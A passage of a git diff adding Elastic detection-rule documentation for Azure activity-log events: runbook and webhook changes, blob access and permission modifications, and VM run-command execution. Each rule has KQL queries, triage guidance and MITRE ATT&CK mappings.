+ +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Automation Runbook Created or Modified* + + +Azure Automation Runbooks are scripts that automate tasks in cloud environments, enhancing operational efficiency. However, adversaries can exploit them to execute unauthorized code and maintain persistence. The detection rule monitors specific Azure activity logs for runbook creation or modification events, flagging successful operations to identify potential misuse. This helps in early detection of malicious activities, ensuring cloud security. 
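+
+Because a malicious runbook is often paired with a webhook trigger, a useful triage pivot is to search the same activity logs for runbook and webhook write operations together. The operation names below are taken from the rule queries in this package; treat this as a hunting sketch rather than a replacement for the rule query.
+
+[source, js]
+----------------------------------
+event.dataset:azure.activitylogs and
+  azure.activitylogs.operation_name:(
+    "MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/WRITE" or
+    "MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/WEBHOOKS/WRITE"
+  )
+
+----------------------------------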
+ + +*Possible investigation steps* + + +- Review the Azure activity logs to identify the specific runbook that was created or modified, focusing on the operation names: "MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/DRAFT/WRITE", "MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/WRITE", or "MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/PUBLISH/ACTION". +- Check the event.outcome field to confirm the operation was successful, as indicated by the values "Success" or "success". +- Identify the user or service principal that performed the operation by examining the relevant user identity fields in the activity logs. +- Investigate the content and purpose of the runbook by reviewing its script or configuration to determine if it contains any unauthorized or suspicious code. +- Correlate the runbook activity with other security events or alerts in the environment to identify any patterns or related malicious activities. +- Verify if the runbook changes align with recent legitimate administrative activities or if they were unexpected, which could indicate potential misuse. + + +*False positive analysis* + + +- Routine updates or maintenance activities by authorized personnel can trigger alerts. To manage this, create exceptions for known maintenance windows or specific user accounts that regularly perform these tasks. +- Automated deployment processes that include runbook creation or modification might be flagged. Identify and exclude these processes by tagging them with specific identifiers in the logs. +- Integration with third-party tools that modify runbooks as part of their normal operation can result in false positives. Work with your IT team to whitelist these tools or their associated accounts. +- Frequent testing or development activities in non-production environments may cause alerts. Consider setting up separate monitoring rules or thresholds for these environments to reduce noise. +- Scheduled runbook updates for compliance or policy changes can be mistaken for suspicious activity. Document these schedules and adjust the detection rule to account for them, possibly by excluding specific operation names during these times. + + +*Response and remediation* + + +- Immediately isolate the affected Azure Automation account to prevent further unauthorized runbook executions. This can be done by disabling the account or restricting its permissions temporarily. +- Review the modified or newly created runbooks to identify any malicious code or unauthorized changes. Remove or revert any suspicious modifications to ensure the integrity of the automation scripts. +- Conduct a thorough audit of recent activities associated with the affected Azure Automation account, focusing on identifying any unauthorized access or changes made by adversaries. +- Reset credentials and update access controls for the affected Azure Automation account to prevent further unauthorized access. Ensure that only authorized personnel have the necessary permissions to create or modify runbooks. +- Implement additional monitoring and alerting for Azure Automation activities, specifically focusing on runbook creation and modification events, to enhance early detection of similar threats in the future. +- Escalate the incident to the security operations team for further investigation and to determine if additional systems or accounts have been compromised. +- Document the incident, including all actions taken and findings, to improve response strategies and update incident response plans for future reference. 
+ +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.activitylogs and + azure.activitylogs.operation_name: + ( + "MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/DRAFT/WRITE" or + "MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/WRITE" or + "MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/PUBLISH/ACTION" + ) and + event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Serverless Execution +** ID: T1648 +** Reference URL: https://attack.mitre.org/techniques/T1648/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-automation-runbook-deleted.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-automation-runbook-deleted.asciidoc new file mode 100644 index 0000000000..6789f80989 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-automation-runbook-deleted.asciidoc @@ -0,0 +1,116 @@ +[[prebuilt-rule-8-19-8-azure-automation-runbook-deleted]] +=== Azure Automation Runbook Deleted + +Identifies when an Azure Automation runbook is deleted. An adversary may delete an Azure Automation runbook in order to disrupt their target's automated business operations or to remove a malicious runbook for defense evasion. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://powerzure.readthedocs.io/en/latest/Functions/operational.html#create-backdoor +* https://github.com/hausec/PowerZure +* https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a +* https://azure.microsoft.com/en-in/blog/azure-automation-runbook-management/ + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Configuration Audit +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Automation Runbook Deleted* + + +Azure Automation Runbooks automate repetitive tasks in cloud environments, enhancing operational efficiency. Adversaries may exploit this by deleting runbooks to disrupt operations or conceal malicious activities. The detection rule monitors Azure activity logs for successful runbook deletions, signaling potential defense evasion tactics, and alerts analysts to investigate further. + + +*Possible investigation steps* + + +- Review the Azure activity logs to confirm the deletion event by checking the operation name "MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/DELETE" and ensure the event outcome is marked as Success. 
+- Identify the user or service principal responsible for the deletion by examining the associated user identity information in the activity logs. +- Investigate the timeline of events leading up to and following the runbook deletion to identify any suspicious activities or patterns, such as unauthorized access attempts or changes to other resources. +- Check for any recent modifications or unusual activities in the affected Azure Automation account to determine if there are other signs of compromise or tampering. +- Assess the impact of the deleted runbook on business operations and determine if any critical automation processes were disrupted. +- If applicable, review any available backup or version history of the deleted runbook to restore it and mitigate operational disruptions. + + +*False positive analysis* + + +- Routine maintenance activities by IT staff may lead to legitimate runbook deletions. To manage this, create exceptions for known maintenance periods or specific user accounts responsible for these tasks. +- Automated scripts or third-party tools that manage runbooks might trigger deletions as part of their normal operation. Identify these tools and exclude their activity from alerts by filtering based on their service accounts or IP addresses. +- Organizational policy changes or cloud environment restructuring can result in planned runbook deletions. Document these changes and adjust the detection rule to exclude these events by correlating with change management records. +- Test environments often involve frequent creation and deletion of runbooks. Exclude these environments from alerts by using tags or specific resource group identifiers associated with non-production environments. + + +*Response and remediation* + + +- Immediately isolate the affected Azure Automation account to prevent further unauthorized deletions or modifications of runbooks. +- Review the Azure activity logs to identify the user or service principal responsible for the deletion and revoke their access if unauthorized. +- Restore the deleted runbook from backups or version control if available, ensuring that the restored version is free from any malicious modifications. +- Conduct a security review of all remaining runbooks to ensure they have not been tampered with or contain malicious code. +- Implement stricter access controls and auditing for Azure Automation accounts, ensuring that only authorized personnel have the ability to delete runbooks. +- Escalate the incident to the security operations team for further investigation and to determine if additional malicious activities have occurred. +- Enhance monitoring and alerting for similar activities by integrating additional context or indicators from the MITRE ATT&CK framework related to defense evasion tactics. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. 
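+
+In addition to the rule query below, reviewing the full lifecycle of a runbook in a single search can make a create, use, and delete pattern easier to spot. This KQL sketch combines only operation names that already appear in this rule package:
+
+[source, js]
+----------------------------------
+event.dataset:azure.activitylogs and
+  azure.activitylogs.operation_name:(
+    "MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/WRITE" or
+    "MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/DELETE"
+  )
+
+----------------------------------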
+ +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.activitylogs and + azure.activitylogs.operation_name:"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/DELETE" and + event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-automation-webhook-created.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-automation-webhook-created.asciidoc new file mode 100644 index 0000000000..6ed3b1a76d --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-automation-webhook-created.asciidoc @@ -0,0 +1,132 @@ +[[prebuilt-rule-8-19-8-azure-automation-webhook-created]] +=== Azure Automation Webhook Created + +Identifies when an Azure Automation webhook is created. Azure Automation runbooks can be configured to execute via a webhook. A webhook uses a custom URL passed to Azure Automation along with a data payload specific to the runbook. An adversary may create a webhook in order to trigger a runbook that contains malicious code. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://powerzure.readthedocs.io/en/latest/Functions/operational.html#create-backdoor +* https://github.com/hausec/PowerZure +* https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a +* https://www.ciraltos.com/webhooks-and-azure-automation-runbooks/ + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Configuration Audit +* Tactic: Persistence +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Automation Webhook Created* + + +Azure Automation webhooks enable automated task execution via HTTP requests, integrating with external systems. Adversaries may exploit this by creating webhooks to trigger runbooks with harmful scripts, maintaining persistence. The detection rule identifies webhook creation events, focusing on specific operation names and successful outcomes, to flag potential misuse in cloud environments. + + +*Possible investigation steps* + + +- Review the Azure activity logs to identify the user or service principal that initiated the webhook creation by examining the `event.dataset` and `azure.activitylogs.operation_name` fields. +- Check the associated runbook linked to the created webhook to determine its purpose and inspect its content for any potentially malicious scripts or commands. +- Investigate the source IP address and location from which the webhook creation request originated to identify any unusual or unauthorized access patterns. 
+- Verify the legitimacy of the webhook by contacting the owner of the Azure Automation account or the relevant team to confirm if the webhook creation was expected and authorized. +- Assess the broader context of the activity by reviewing recent changes or activities in the Azure Automation account to identify any other suspicious actions or configurations. + + +*False positive analysis* + + +- Routine webhook creations for legitimate automation tasks can trigger false positives. Review the context of the webhook creation, such as the associated runbook and its purpose, to determine if it aligns with expected operations. +- Frequent webhook creations by trusted users or service accounts may not indicate malicious activity. Consider creating exceptions for these users or accounts to reduce noise in alerts. +- Automated deployment processes that involve creating webhooks as part of their workflow can be mistaken for suspicious activity. Document these processes and exclude them from triggering alerts if they are verified as safe. +- Integration with third-party services that require webhook creation might generate alerts. Verify these integrations and whitelist them if they are part of approved business operations. +- Regularly review and update the list of exceptions to ensure that only verified non-threatening behaviors are excluded, maintaining the effectiveness of the detection rule. + + +*Response and remediation* + + +- Immediately disable the suspicious webhook to prevent further execution of potentially harmful runbooks. +- Review the runbook associated with the webhook for any unauthorized or malicious scripts and remove or quarantine any identified threats. +- Conduct a thorough audit of recent changes in the Azure Automation account to identify any unauthorized access or modifications. +- Revoke any compromised credentials and enforce multi-factor authentication (MFA) for all accounts with access to Azure Automation. +- Notify the security team and relevant stakeholders about the incident for further investigation and to ensure awareness of potential threats. +- Implement enhanced monitoring and alerting for webhook creation and execution activities to detect similar threats in the future. +- Document the incident, including actions taken and lessons learned, to improve response strategies and prevent recurrence. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. 
+ +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.activitylogs and + azure.activitylogs.operation_name: + ( + "MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/WEBHOOKS/ACTION" or + "MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/WEBHOOKS/WRITE" + ) and + event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Tactic: +** Name: Resource Development +** ID: TA0042 +** Reference URL: https://attack.mitre.org/tactics/TA0042/ +* Technique: +** Name: Stage Capabilities +** ID: T1608 +** Reference URL: https://attack.mitre.org/techniques/T1608/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-blob-container-access-level-modification.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-blob-container-access-level-modification.asciidoc new file mode 100644 index 0000000000..3a645e3fc9 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-blob-container-access-level-modification.asciidoc @@ -0,0 +1,131 @@ +[[prebuilt-rule-8-19-8-azure-blob-container-access-level-modification]] +=== Azure Blob Container Access Level Modification + +Identifies changes to container access levels in Azure. Anonymous public read access to containers and blobs in Azure is a way to share data broadly, but can present a security risk if access to sensitive data is not managed judiciously. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/storage/blobs/anonymous-read-access-prevent + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Asset Visibility +* Tactic: Discovery +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Blob Container Access Level Modification* + + +Azure Blob Storage is a service for storing large amounts of unstructured data, where access levels can be configured to control data visibility. Adversaries may exploit misconfigured access levels to gain unauthorized access to sensitive data. The detection rule monitors changes in container access settings, focusing on successful modifications, to identify potential security risks associated with unauthorized access level changes. + + +*Possible investigation steps* + + +- Review the Azure activity logs to identify the specific storage account and container where the access level modification occurred, using the operation name "MICROSOFT.STORAGE/STORAGEACCOUNTS/BLOBSERVICES/CONTAINERS/WRITE". 
+- Verify the identity of the user or service principal that performed the modification by examining the associated user information in the activity logs. +- Check the timestamp of the modification to determine if it aligns with any known maintenance windows or authorized changes. +- Investigate the previous access level settings of the container to assess the potential impact of the change, especially if it involved enabling anonymous public read access. +- Correlate the event with any other recent suspicious activities or alerts in the Azure environment to identify potential patterns or coordinated actions. +- Contact the owner of the storage account or relevant stakeholders to confirm whether the change was authorized and aligns with organizational policies. + + +*False positive analysis* + + +- Routine administrative changes to container access levels by authorized personnel can trigger alerts. To manage this, create exceptions for specific user accounts or roles that regularly perform these tasks. +- Automated scripts or tools used for managing storage configurations may cause false positives. Identify and exclude these scripts or tools from monitoring if they are verified as non-threatening. +- Scheduled updates or maintenance activities that involve access level modifications can be mistaken for unauthorized changes. Document and schedule these activities to align with monitoring rules, allowing for temporary exclusions during these periods. +- Changes made by trusted third-party services integrated with Azure Blob Storage might be flagged. Verify these services and exclude their operations from triggering alerts if they are deemed secure and necessary for business operations. + + +*Response and remediation* + + +- Immediately revoke public read access to the affected Azure Blob container to prevent unauthorized data exposure. +- Review the access logs to identify any unauthorized access or data exfiltration attempts during the period when the access level was modified. +- Notify the security team and relevant stakeholders about the incident, providing details of the unauthorized access level change and any potential data exposure. +- Conduct a thorough audit of all Azure Blob containers to ensure that access levels are configured according to the organization's security policies and that no other containers are misconfigured. +- Implement additional monitoring and alerting for changes to access levels on Azure Blob containers to ensure rapid detection of any future unauthorized modifications. +- If sensitive data was exposed, initiate a data breach response plan, including notifying affected parties and regulatory bodies as required by law. +- Review and update access management policies and procedures to prevent recurrence, ensuring that only authorized personnel can modify container access levels. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. 
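+
+During an investigation it is often useful to scope the rule query below to a single resource group or storage account. The `azure.resource.group` field name is assumed from the Azure integration's resource metadata mapping and the value is a placeholder; replace both to match your environment.
+
+[source, js]
+----------------------------------
+event.dataset:azure.activitylogs and
+  azure.activitylogs.operation_name:"MICROSOFT.STORAGE/STORAGEACCOUNTS/BLOBSERVICES/CONTAINERS/WRITE" and
+  azure.resource.group:"my-resource-group"
+
+----------------------------------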
+ +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOFT.STORAGE/STORAGEACCOUNTS/BLOBSERVICES/CONTAINERS/WRITE" and event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Cloud Storage Object Discovery +** ID: T1619 +** Reference URL: https://attack.mitre.org/techniques/T1619/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: File and Directory Permissions Modification +** ID: T1222 +** Reference URL: https://attack.mitre.org/techniques/T1222/ +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Transfer Data to Cloud Account +** ID: T1537 +** Reference URL: https://attack.mitre.org/techniques/T1537/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-blob-permissions-modification.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-blob-permissions-modification.asciidoc new file mode 100644 index 0000000000..775929c5fc --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-blob-permissions-modification.asciidoc @@ -0,0 +1,118 @@ +[[prebuilt-rule-8-19-8-azure-blob-permissions-modification]] +=== Azure Blob Permissions Modification + +Identifies when the Azure role-based access control (Azure RBAC) permissions are modified for an Azure Blob. An adversary may modify the permissions on a blob to weaken their target's security controls or an administrator may inadvertently modify the permissions, which could lead to data exposure or loss. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/role-based-access-control/built-in-roles + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Identity and Access Audit +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 108 + +*Rule authors*: + +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Blob Permissions Modification* + + +Azure Blob Storage is a service for storing large amounts of unstructured data. It uses Azure RBAC to manage access, ensuring only authorized users can modify or access data. Adversaries may exploit this by altering permissions to gain unauthorized access or disrupt operations. The detection rule monitors specific Azure activity logs for successful permission changes, alerting analysts to potential security breaches or misconfigurations. 
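+
+Permission changes on individual blobs are often accompanied by changes to container access levels, so reviewing both in one search can speed up triage. The following KQL sketch combines only operation names that appear elsewhere in this rule package:
+
+[source, js]
+----------------------------------
+event.dataset:azure.activitylogs and
+  azure.activitylogs.operation_name:(
+    "MICROSOFT.STORAGE/STORAGEACCOUNTS/BLOBSERVICES/CONTAINERS/BLOBS/MANAGEOWNERSHIP/ACTION" or
+    "MICROSOFT.STORAGE/STORAGEACCOUNTS/BLOBSERVICES/CONTAINERS/BLOBS/MODIFYPERMISSIONS/ACTION" or
+    "MICROSOFT.STORAGE/STORAGEACCOUNTS/BLOBSERVICES/CONTAINERS/WRITE"
+  )
+
+----------------------------------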
+ + +*Possible investigation steps* + + +- Review the Azure activity logs to identify the user or service principal associated with the permission modification event by examining the relevant fields such as `event.dataset` and `azure.activitylogs.operation_name`. +- Check the `event.outcome` field to confirm the success of the permission modification and gather details on the specific permissions that were altered. +- Investigate the context of the modification by reviewing recent activities of the identified user or service principal to determine if the change aligns with their typical behavior or role. +- Assess the potential impact of the permission change on the affected Azure Blob by evaluating the sensitivity of the data and the new access levels granted. +- Cross-reference the modification event with any recent security alerts or incidents to identify if this change is part of a broader attack pattern or misconfiguration issue. +- Consult with the relevant data owners or administrators to verify if the permission change was authorized and necessary, and if not, take corrective actions to revert the changes. + + +*False positive analysis* + + +- Routine administrative changes to Azure Blob permissions by authorized personnel can trigger alerts. To manage this, create exceptions for specific user accounts or roles that frequently perform legitimate permission modifications. +- Automated scripts or tools used for regular maintenance or deployment might modify permissions as part of their operation. Identify these scripts and exclude their activity from triggering alerts by using specific identifiers or tags associated with the scripts. +- Scheduled updates or policy changes that involve permission modifications can result in false positives. Document these schedules and adjust the monitoring rules to account for these timeframes, reducing unnecessary alerts. +- Integration with third-party services that require permission changes might cause alerts. Review and whitelist these services if they are verified and necessary for operations, ensuring they do not trigger false positives. + + +*Response and remediation* + + +- Immediately revoke any unauthorized permissions identified in the Azure Blob Storage to prevent further unauthorized access or data exposure. +- Conduct a thorough review of the Azure Activity Logs to identify any other suspicious activities or permission changes that may have occurred around the same time. +- Notify the security team and relevant stakeholders about the incident, providing details of the unauthorized changes and any potential data exposure. +- Implement additional monitoring on the affected Azure Blob Storage accounts to detect any further unauthorized access attempts or permission modifications. +- Escalate the incident to the incident response team if there is evidence of a broader security breach or if sensitive data has been compromised. +- Review and update Azure RBAC policies to ensure that only necessary permissions are granted, and consider implementing more granular access controls to minimize the risk of future unauthorized modifications. +- Conduct a post-incident analysis to identify the root cause of the permission change and implement measures to prevent similar incidents in the future, such as enhancing logging and alerting capabilities. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. 
+ +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.activitylogs and azure.activitylogs.operation_name:( + "MICROSOFT.STORAGE/STORAGEACCOUNTS/BLOBSERVICES/CONTAINERS/BLOBS/MANAGEOWNERSHIP/ACTION" or + "MICROSOFT.STORAGE/STORAGEACCOUNTS/BLOBSERVICES/CONTAINERS/BLOBS/MODIFYPERMISSIONS/ACTION") and + event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: File and Directory Permissions Modification +** ID: T1222 +** Reference URL: https://attack.mitre.org/techniques/T1222/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-command-execution-on-virtual-machine.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-command-execution-on-virtual-machine.asciidoc new file mode 100644 index 0000000000..5509b4c4ce --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-command-execution-on-virtual-machine.asciidoc @@ -0,0 +1,118 @@ +[[prebuilt-rule-8-19-8-azure-command-execution-on-virtual-machine]] +=== Azure Command Execution on Virtual Machine + +Identifies command execution on a virtual machine (VM) in Azure. A Virtual Machine Contributor role lets you manage virtual machines, but not access them, nor access the virtual network or storage account they’re connected to. However, commands can be run via PowerShell on the VM, which execute as System. Other roles, such as certain Administrator roles may be able to execute commands on a VM as well. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://adsecurity.org/?p=4277 +* https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a +* https://docs.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#virtual-machine-contributor + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Log Auditing +* Tactic: Execution +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Command Execution on Virtual Machine* + + +Azure Virtual Machines (VMs) allow users to run applications and services in the cloud. While roles like Virtual Machine Contributor can manage VMs, they typically can't access them directly. However, commands can be executed remotely via PowerShell, running as System. Adversaries may exploit this to execute unauthorized commands. The detection rule monitors Azure activity logs for command execution events, flagging successful operations to identify potential misuse. 
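+
+The rule only alerts on successful run command operations, so denied or failed attempts are worth a separate look during triage, as they may reveal an actor probing for permissions. This minimal KQL sketch uses only the fields from the rule query below:
+
+[source, js]
+----------------------------------
+event.dataset:azure.activitylogs and
+  azure.activitylogs.operation_name:"MICROSOFT.COMPUTE/VIRTUALMACHINES/RUNCOMMAND/ACTION" and
+  not event.outcome:(Success or success)
+
+----------------------------------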
+ + +*Possible investigation steps* + + +- Review the Azure activity logs to identify the specific user or service principal that initiated the command execution event, focusing on the operation_name "MICROSOFT.COMPUTE/VIRTUALMACHINES/RUNCOMMAND/ACTION". +- Check the event.outcome field to confirm the success of the command execution and gather details about the command executed. +- Investigate the role and permissions of the user or service principal involved to determine if they have legitimate reasons to execute commands on the VM. +- Analyze the context of the command execution, including the time and frequency of the events, to identify any unusual patterns or anomalies. +- Correlate the command execution event with other logs or alerts from the same time period to identify any related suspicious activities or potential lateral movement. +- If unauthorized access is suspected, review the VM's security settings and access controls to identify and mitigate any vulnerabilities or misconfigurations. + + +*False positive analysis* + + +- Routine maintenance tasks executed by IT administrators can trigger the rule. To manage this, create exceptions for known maintenance scripts or scheduled tasks that are regularly executed. +- Automated deployment processes that use PowerShell scripts to configure or update VMs may be flagged. Identify these processes and exclude them from the rule to prevent unnecessary alerts. +- Security tools or monitoring solutions that perform regular checks on VMs might execute commands that are benign. Whitelist these tools by identifying their specific command patterns and excluding them from detection. +- Development and testing environments often involve frequent command executions for testing purposes. Consider excluding these environments from the rule or setting up a separate monitoring policy with adjusted thresholds. +- Ensure that any exclusion or exception is documented and reviewed periodically to maintain security posture and adapt to any changes in the environment or processes. + + +*Response and remediation* + + +- Immediately isolate the affected virtual machine from the network to prevent further unauthorized command execution and potential lateral movement. +- Review the Azure activity logs to identify the source of the command execution and determine if it was authorized or part of a larger attack pattern. +- Revoke any unnecessary permissions from users or roles that have the ability to execute commands on virtual machines, focusing on those with Virtual Machine Contributor roles. +- Conduct a thorough investigation of the executed commands to assess any changes or impacts on the system, and restore the VM to a known good state if necessary. +- Implement additional monitoring and alerting for similar command execution activities, ensuring that any future unauthorized attempts are detected promptly. +- Escalate the incident to the security operations team for further analysis and to determine if additional systems or data may have been compromised. +- Review and update access control policies and role assignments to ensure that only necessary permissions are granted, reducing the risk of similar incidents in the future. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. 
